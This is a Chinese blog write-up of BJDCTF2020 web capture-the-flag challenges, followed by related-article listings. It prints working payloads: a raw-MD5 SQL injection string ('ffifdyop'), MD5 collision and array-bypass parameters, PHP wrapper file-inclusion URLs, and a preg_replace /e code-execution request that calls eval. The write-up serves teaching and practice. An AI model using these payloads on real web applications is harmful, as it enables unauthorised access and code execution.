[原题复现]BJDCTF2020 WEB部分全部解

最新推荐文章于 2024-06-17 22:56:29 发布
最新推荐文章于 2024-06-17 22:56:29 发布
阅读量1.3k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43818995/article/details/105213799
版权

 简介

 原题复现:https://gitee.com/xiaohua1998/BJDCTF2020_January

 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题

1.Easy MD5

 1.涉及知识点:md5函数特性绕过、SQL注入

 md5() 

 md5() 函数计算字符串的 MD5 散列。

 md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。

md5(string,raw)
string必需。规定要计算的字符串。
raw

可选。规定十六进制或二进制输出格式:

  • TRUE - 原始 16 字符二进制格式
  • FALSE - 默认。32 字符十六进制数

 

2.通过md5($pass,true)实现SQL注入 

bp抓包  发包发现这一句

Hint: select * from 'admin' where password=md5($pass,true)

 

 可以看到这里的raw参数是True,意为返回原始16字符二进制格式。

 也就是说如果md5值经过hex转成字符串后为 'or'+balabala这样的字符串,则拼接后构成的SQL语句为:

select * from `admin` where password=''or'balabala'

 

 当'or'后面的值为True时,即可构成万能密码实现SQL注入,这里我们需要知道的是MySQL的一个特性:

所以只要'or'后面的字符串为一个非零的数字开头都会返回True,这就是我们的突破点。

 

可以通过这个脚本来获得满足我们要求的明文:

<?php 
for ($i = 0;;) { 
 for ($c = 0; $c < 1000000; $c++, $i++)
  if (stripos(md5($i, true), '\'or\'') !== false)
   echo "\nmd5($i) = " . md5($i, true) . "\n";
 echo ".";
}
?>

//引用于 http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/

 

这里提供一个最常用的:ffifdyop,该字符串md5加密后若raw参数为True时会返回 'or'6<trash> (<trash>其实就是一些乱码和不可见字符,这里只要第一位是非零数字即可被判定为True,后面的<trash>会在MySQL将其转换成整型比较时丢掉)

所以如果这里我们输入ffifdyop,后端的SQL语句会变成:

select * from `admin` where password=''or'6<trash>'           --->  True

 

引用大佬博客:https://www.cnblogs.com/yesec/p/12535534.html

所以输入ffidyop会到下一个页面。

 

3.通过Hash缺陷绕过md5()验证

hash缺陷参考https://www.cnblogs.com/xhds/p/12349189.html

通过查看源代码发现源码

payload:

http://96c67b57-df3d-41a2-bc76-836c71cda19b.node3.buuoj.cn/levels91.php?a=s878926199a&b=QNKCDZO

4.通过数组绕过

到下一个页面直接暴露出源码进行绕过

 payload:

POST:param1[]=1&param2[]=2

 

CTF数组绕过姿势

>     md5(array()) = null
>     sha1(array()) = null    
>     ereg(pattern,array()) = null vs preg_match(pattern,array) = false
>     strcmp(array(), "abc") = null
>     strpos(array(),"abc") = null

引用:https://blog.csdn.net/q1352483315/java/article/details/89469928

 

 

 

 2.ZJCTF,不过如此

 1.涉及知识点:文件包含、preg_replace()使用的/e模式可以存在远程执行代码

    reg_replace()使用的/e模式可以存在远程执行代码

    https://xz.aliyun.com/t/2557

2.本地文件包含漏洞利用

打开页面出现源码 审计构造..... 

第一个部分可以利用本地文件包含绕过

首先I have a dream base64编码 SSBoYXZlIGEgZHJlYW0= 使用PHP伪协议来绕过 file_get_contents==="I have a dream"  页面有个注释内容为next.PHP

最后构造payload:

?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource=next.php

获得next.php文件的源码

 

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

 3.利用.reg_replace()使用的/e模式远程执行代码getflag

payload:

/next.php?\S*=${getflag()}&cmd=show_source(%22/flag%22);

 简介

1

 简介

1

 简介

1

笑花大王
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BJD2020
pwnyuan's blog
10-22 798
BJDCTF 2020Beforewp这是base??easyrsaPolybiusrsa_outputRSAsignin1编码与调制伏羲六十四卦-- coding:UTF-8 ---*- coding:UTF-8 -*- Before BJD又来了一个比赛,但是当时我各种七七八八的事,没打,这是我事后在buu上复现的wp wp 这是base?? dict:{0: ‘J’, 1: ‘K’, 2: ‘L’, 3: ‘M’, 4: ‘N’, 5: ‘O’, 6: ‘x’, 7: ‘y’, 8: ‘U’, 9
24年云曦考核web复现部分
03-18
24年云曦考核web复现部分
[BJDCTF2020]rsa_output
m0_74030040的博客
04-09 525
版权声明:本文为CSDN博主「JustGo12」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。我们首先审计题目,可以发现题目中给了我们两个c和不同的{n,e}值,所以我们可以推断本题为共模攻击题目。原文链接:https://blog.csdn.net/shshss64/article/details/127182144。两者相乘,通过扩展欧几里得定理,我们可知e1与e2互质,必存在s1和s2使e1*s1+e2*s2=1。由此可求出相对应的s1和s2.
BJDCTF2020CRYPTO
ZBDX2113的博客
05-07 1148
这次做一些简单题,巩固一下基础 首先是ctfshow内部赛密码2 全文只给出了ctf和show两个单词,不是什么特殊字符,也不属于特殊密,类似于这样的,可以想到摩斯密码,它是由-与.组成的,试着用ctf作.,show作-,敲完前四行编码,转换之后为flag,所以挨个敲就好了。 BJDCTF2020签到题 这种题目一般是归纳总结,仅有小写字母与数字组成的密文,我们可以想到MD5,hex,键盘密码等等,这道题使用的是hex编码,直接带入网站就好。 BJDCTF2020编码与调制 这
[BJDCTF2020]ZJCTF,不过如此1
m0_73673698的博客
06-17 1008
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64码就是next.php的源码了,源码如下。
[BJDCTF2020]RSA ==>低加密指数攻击
LYJ20010728的博客
12-01 782
题目地址 task.py内容如下: from Crypto.Util.number import getPrime,bytes_to_long flag=open("flag","rb").read() p=getPrime(1024) q=getPrime(1024) assert(e<100000) n=p*q m=bytes_to_long(flag) c=pow(m,e,n) print c,n print pow(294,e,n) p=getPrime(1024) n=p*q m=by
BJDCTF-writeup
夏日 の blog
03-23 1880
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ng总结 杂项 最简单的misc-y1ng 题目是一个zip包,尝试压出错,用AZR压缩包修复工具修复后,压得到一个secret文件,由于没有后缀名,放入010editor查看,发现含有IHDR ...
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1277
题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
XYCTF部分web题目复现
05-06
XYCTF部分web题目复现
web安全程序设计大作业漏洞复现及修复
最新发布
07-05
web安全程序设计大作业漏洞复现及修复,本实验采用xss漏洞利用靶场进行复现和修复,并且找到一个网站成功攻击了xss。本次报告打分85。
96原版_96年mpc论文代码复现_
10-04
在IT领域,特别是计算机科学与工程中,代码复现是一项重要的技能,它涉及到对已有算法或研究的重新实现,以验证其正确性、理和优化。本项目“96原版_96年mpc论文代码复现”显然是针对1996年的一篇关于模型预测控制...
[BJDCTF 2020] EzPHP
weixin_51804748的博客
11-15 4609
前言 最近经常见到BJDCTF赛题的改版,其中有一道很经典的代码审计题目,写篇博客学习一下 https://github.com/BjdsecCA/BJDCTF2020 Part 1 (主页) 打开题目之后是一个网页,并没有和题有关的信息 查看源代码后发现注释信息中有提示GFXEIM3YFZYGQ4A=,用base码后得到信息1nD3x.php 访问/1nD3x.php得到源码 <?php highlight_file(__FILE__); error_reporting(0);
BJD CTF web
0xdawn的博客
04-10 1056
Easy MD5 响应头里的hint告知了sql语句: select * from 'admin' where password=md5($pass,true) password=md5($pass,true) ffifdyop这个字符串被MD5哈希了之后会变成276f722736c95d99e921722cf9ed621c,而这个字符串开头刚好是' or '6,而Mysql会把hex转为asc...
BJDCTF2020
Nobug_的博客
09-06 622
[BJDCTF2020]藏藏藏 打开题目后发现 直接打开下面的jpg文件 出现一个二维码 扫码得flag{you are the best!} [BJDCTF2020]鸡你太美 可以发现打开压缩包里面有两张gif图片 但是第一个gif图片打不开我们把它拖到010Editor 去查看 我们可以发现 第二个gif图片没有文件头 我们把GIF的文件头补齐 就可以拿到flag 47 49 46 38 添加过文件头之后就可以查看图片 flag{zhi_yin_you_are_beautiful} [BJD
[BJDCTF2020]ZJCTF,不过如此 简单思路及做法
EC_Carrot的博客
12-07 858
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 稍微审计,发现需要读到文件内容为I have a dream,自然而然的就可以想到用伪协议来做题! 注释里提醒了next.php,我们同样用伪协议base64加密来读文件 data://text/plain, php://input 读到的内容码出来 <?php $id = $_GET['id']; $_SESSION['id'] =
Mysql注入学习笔记
xj28555的博客
06-25 2147
MYSQL注入 函数 version()——MySQL 版本 user()——数据库用户名 database()——数据库名 @@datadir——数据库路径 @@version_compile_os——操作系统版本 information_schema 自带数据库 information_schema.schemata 数据库 information_schema.tables 数据表 information_schema.columns 数据列 floor函数返回小于等于该值的最大整数 RAND()
CTF-Misc-[BJDCTF2020]鸡你太美
归子莫的博客
05-14 3367
CTF-Misc-[BJDCTF2020]鸡你太美 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Misc类,[BJDCTF2020]鸡你太美 思路 这类题目首先把文件下载下来,是一个gif 第一张能够打开,第二张打不开 使用bless 我是在linux下,当然你可以在windows下使用winhex 对比
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 666
[buuctf]bjdctf_2020_babystack
yolov5复现ccpd2020
05-05
首先,你需要下载CCPD2020数据集,并将其分为训练集、验证集和测试集。然后,你需要下载YOLOv5代码,或者通过GitHub克隆开源代码。 接着,你需要修改YOLOv5代码中的配置文件,以适应CCPD2020数据集的特征。具体来说,你需要修改数据集的路径、类别数和锚框尺寸等参数。你还需要选择一个适当的预训练模型,例如YOLOv5s、YOLOv5m、YOLOv5l或YOLOv5x,并将其与CCPD2020数据集进行微调。在训练模型之前,你可以使用数据增强技术来扩充数据集,以提高模型的泛化能力。 在训练过程中,你可以使用TensorBoard来可视化训练过程中的损失和指标。同时,你还可以使用EarlyStopping技术来避免过拟合,并使用学习率调整策略来优化模型的收敛速度。 最后,在测试阶段,你可以使用训练好的模型来检测CCPD2020数据集中的车牌。你可以使用mAP(平均精度)指标来评估模型的性能,并根据结果进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值